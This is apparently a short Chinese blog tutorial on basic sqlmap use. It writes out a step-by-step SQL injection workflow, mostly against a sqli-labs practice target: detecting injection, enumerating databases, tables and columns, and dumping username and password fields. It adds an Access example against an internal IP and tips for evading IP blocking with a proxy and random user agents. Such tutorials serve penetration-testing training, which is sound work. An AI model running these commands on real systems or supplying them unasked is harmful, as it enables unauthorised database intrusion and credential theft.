sqlmap基本使用
Mysql数据库
1、先检测是否可以注入,先判断是否可以正常注入:
sqlmap -u url -v 3
里面有个注意的点url后面必须是可注入的参数?id=之类的,否则url检测会有问题
对于某些今天url可以在/a/b.html尝试加入号来进行此路径内的检测
2、爆库
【sqlmap基本使用】sqlmap.py -u http://sqli-labs-master/Less-... -v 3 --dbs --batch
3、根据爆出来的库查表
sqlmap.py -u http://sqli-labs-master/Less-... -v 3 -D "security" --tables --batch
4、根据表查字段
sqlmap.py -u http://sqli-labs-master/Less-... -v 3 -D "security" -T "users" --columns --batch
5、根据字段查值
sqlmap.py -u http://sqli-labs-master/Less-... -v 3 -D "security" -T "users" -C "username,password" --dump --batch
防止被IP拦截的操作,random-agent让请求头随机:
可以在后面增加--proxy http://127.0.0.1:8080 --random-agent -v 3
Access
对于Access数据库,直接报表就OK
sqlmap -u "http://192.168.96.16/shownews.asp?id=23" --tables
sqlmap里面的字典位置,内置字典位置为,可以根据自己的需要更改,对于Access一般就是直接暴库
sqlmap\data\txt
推荐阅读
- 由浅入深理解AOP
- 做一件事情的基本原理是什么()
- 【译】20个更有效地使用谷歌搜索的技巧
- mybatisplus如何在xml的连表查询中使用queryWrapper
- MybatisPlus|MybatisPlus LambdaQueryWrapper使用int默认值的坑及解决
- MybatisPlus使用queryWrapper如何实现复杂查询
- dubbo基本认识
- iOS中的Block
- Linux下面如何查看tomcat已经使用多少线程
- 使用composer自动加载类文件